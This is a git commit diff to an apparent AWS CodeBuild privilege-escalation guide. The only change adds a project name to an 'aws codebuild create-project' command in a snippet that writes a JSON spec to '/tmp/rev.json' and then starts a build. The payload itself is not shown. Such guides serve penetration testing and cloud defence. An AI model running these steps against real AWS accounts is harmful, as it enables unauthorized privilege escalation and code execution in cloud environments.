Update aws-codebuild-privesc.md

This commit is contained in:
letian-cheng
2024-12-26 13:00:53 -07:00
parent beb57622fb
commit 8510f564df

View File

@@ -118,7 +118,7 @@ REV_PATH="/tmp/rev.json"
printf "$JSON" > $REV_PATH
# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
# Build it
aws codebuild start-build --project-name codebuild-demo-project